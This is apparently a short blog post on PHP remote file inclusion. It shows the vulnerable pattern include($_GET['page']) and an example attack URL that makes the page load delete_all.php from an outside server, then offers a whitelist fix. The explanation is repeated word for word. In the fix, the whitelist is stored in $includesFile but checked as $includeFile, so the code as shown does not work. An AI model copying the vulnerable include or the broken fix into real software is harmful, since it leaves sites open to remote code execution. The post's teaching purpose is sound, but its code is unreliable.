In some application, developer including the files dynamically and using the depending on URL argument to including the file name.
For example, see following URL.
$file=$_GET['page'];
include($file);
In above, developer is including file that is depending on the page argument in URI.
This type of development can have some very serious problem, If someone put the external URL page url.
See example below
/index.php?page=http://example.php/delete_all.php
When above URL is called, It will including delete_all.php file from another server that have dangerous code that delete all the data.
This is known as Remote Code Injection.
In Remote Code Injection, attacker put the his code, that may harm the website.
How to avoid the Remote Code Injection.
For example, see following URL.
- /index.php?page=dashboard.php
- /index.php?page=change_password.php
- /index.php?page=buynow.php
$file=$_GET['page'];
include($file);
In above, developer is including file that is depending on the page argument in URI.
This type of development can have some very serious problem, If someone put the external URL page url.
See example below
/index.php?page=http://example.php/delete_all.php
When above URL is called, It will including delete_all.php file from another server that have dangerous code that delete all the data.
This is known as Remote Code Injection.
In Remote Code Injection, attacker put the his code, that may harm the website.
How to avoid the Remote Code Injection.
$file=$_GET['page'];
$includesFile = array('dashboard.php','change_password.php','buynow.php');
if(in_array($file, $includeFile)){
include($file);
}else{
include('filenotfound.php');
}
No comments:
Post a Comment